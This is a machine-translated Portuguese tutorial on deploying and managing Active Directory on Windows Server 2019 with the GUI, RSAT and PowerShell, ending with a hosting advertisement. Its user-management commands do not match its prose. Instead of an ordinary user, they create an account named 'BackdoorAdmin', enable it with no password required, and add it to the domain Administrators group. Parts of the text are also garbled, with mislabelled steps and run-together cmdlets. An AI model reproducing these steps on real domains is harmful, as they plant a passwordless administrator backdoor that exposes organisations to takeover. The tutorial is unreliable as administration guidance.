Implantamos o Active Directory por todos os métodos possíveis.

Uma das inovações realmente úteis no Windows Server 2019 é a capacidade de entrar em servidores sem precisar fazer o Sysprep ou fazer uma instalação limpa. A implantação de infraestrutura em servidores virtuais com o Windows Server nunca foi tão fácil.


Hoje falaremos sobre como é fácil instalar e gerenciar o Active Directory através do Powershell.

Defina a função


RSAT ou servidor local com GUI:


Primeiro você precisa adicionar o servidor ao RSAT. É adicionado na página principal usando um nome de domínio ou endereço IP. Certifique-se de inserir o logon no formato local\Administrator , caso contrário, o servidor não aceitará a senha.


Vá para adicionar componentes e selecione AD DS.

Powershell:


Se você não souber o nome do componente do sistema, poderá executar o comando e obter uma lista dos componentes disponíveis, suas dependências e nomes.

 Get-WindowsFeature 


Copie o nome do componente e continue com a instalação.

 Install-WindowsFeature -Name AD-Domain-Services 

Centro de administração do Windows:


Vá para "Funções e recursos" e selecione ADDS (Serviços de Domínio Active Directory).

E isso é literalmente tudo. No momento, não é possível gerenciar o Active Directory através do Windows Admin Center. Sua menção nada mais é do que um lembrete de quão inútil ele está até agora.

Levante o servidor para um controlador de domínio


E para isso criamos uma nova floresta.

Servidores RSAT ou GUI local:



É altamente recomendável que você deixe tudo como padrão, todos os componentes fora da caixa funcionam bem e eles não precisam ser tocados sem nenhuma necessidade especial.

Powershell:

Primeiro, você precisa criar uma floresta e definir uma senha para ela. O Powershell possui um tipo de variável separado para senhas - SecureString, que é usado para armazenar com segurança uma senha na RAM e transferi-la com segurança pela rede.


 $pass = Read-Host -AsSecureString 

Qualquer cmdlet que usa a senha de qualquer pessoa deve ser inserido dessa maneira. Primeiro, escreva a senha no SecureString e especifique essa variável no cmdlet.


 Install-ADDSForest -DomainName test.domain -SafeModeAdministratorPassword $pass 

Como na instalação via GUI, até a saída para o console é a mesma. Ao contrário de um servidor com uma GUI, a instalação de uma função e a instalação de um servidor como controlador de domínio não exigem uma reinicialização.

Instalar o controlador usando RSAT leva mais tempo do que usar o PowerShell.

Nós gerenciamos o domínio


Agora, para entender o quanto o gerenciamento do Active Directory difere no Powershell e no AD AC (Centro Administrativo do Active Directory), considere alguns exemplos de trabalho.

Crie um novo usuário


Digamos que queremos criar um usuário no grupo Usuários e que ele defina uma senha para si mesmo. Via AD AC, fica assim:


 New-ADUser -Name BackdoorAdmin -UserPrincipalName BackdoorAdmin@test Get-ADUser BackdoorAdmin 

Não há diferenças entre o AD DC e o Powershell.

Ativar usuário


Servidores RSAT ou GUI local:


Por meio da GUI, o usuário deve primeiro definir a senha correspondente ao GPO e somente depois disso ela pode ser ativada.

Powershell:


O PowerShell é quase a mesma coisa, apenas o usuário pode ser ativado mesmo sem uma senha.

 Set-ADUser -Identity BackdoorAdmin -Enabled $true -PasswordNotRequired $true 

Adicionar usuário ao grupo


RSAT ou servidor local com GUI:


Usando o AD DC, você precisa acessar as propriedades do usuário, encontrar a coluna com a associação de usuários nos grupos, encontrar o grupo no qual queremos colocá-lo e adicioná-lo finalmente, e depois clicar em OK.

Powershell:


Se não soubermos o nome do grupo de que precisamos, podemos obter uma lista deles usando:

 (Get-ADGroup -Server localhost -Filter *).name 

Você pode obter um grupo com todas as propriedades como esta:


 Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"} 

Por fim, adicione o usuário ao grupo:


Além disso, devido ao fato de que tudo é um objeto no Powershell, nós, como no AD DC, precisamos primeiro obter um grupo de usuários e depois adicioná-lo a ele.

 $user = Get-ADUser BackdoorAdmin 

Em seguida, adicione este objeto ao grupo:

 Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"} | Add-ADGroupMember -Members $user 

E verifique:

 Get-ADGroupMember -Identity Administrators 

Como você pode ver, quase não há diferenças no gerenciamento do AD por meio do AD AC e do Powershell.

Conclusão:


Se você já encontrou a implantação do AD e de outros serviços, pode ter notado as semelhanças da implantação por meio do RSAT e do Powershell e a aparência de tudo. GUI no núcleo, afinal.

Esperamos que o artigo seja útil ou interessante.

E, finalmente, algumas dicas práticas:

  1. Não instale outras funções em um controlador de domínio.
  2. Use o BPA (Best Practice Analyzer) para acelerar um pouco o controlador
  3. Não use o administrador interno do Enterprice, sempre use sua própria conta.
  4. Ao implantar o servidor em um endereço IP branco, com portas encaminhadas ou no VSD, feche a porta 389, caso contrário você se tornará o ponto de amplificação dos ataques DDoS.

Também oferecemos a leitura de nossas postagens anteriores: uma história sobre como preparamos máquinas virtuais clientes usando o exemplo de nossa tarifa VDS Ultralight com Server Core por 99 rublos, como trabalhar com o Windows Server 2019 Core e como instalar uma GUI nele , e como gerenciar o servidor usando o Windows Admin Centro de instalação do Exchange 2019 no Windows Server Core 2019

Oferecemos uma tarifa atualizada do UltraLite Windows VDS por 99 rublos com o Windows Server 2019 Core instalado.

Source: https://habr.com/ru/post/pt480776/


All Articles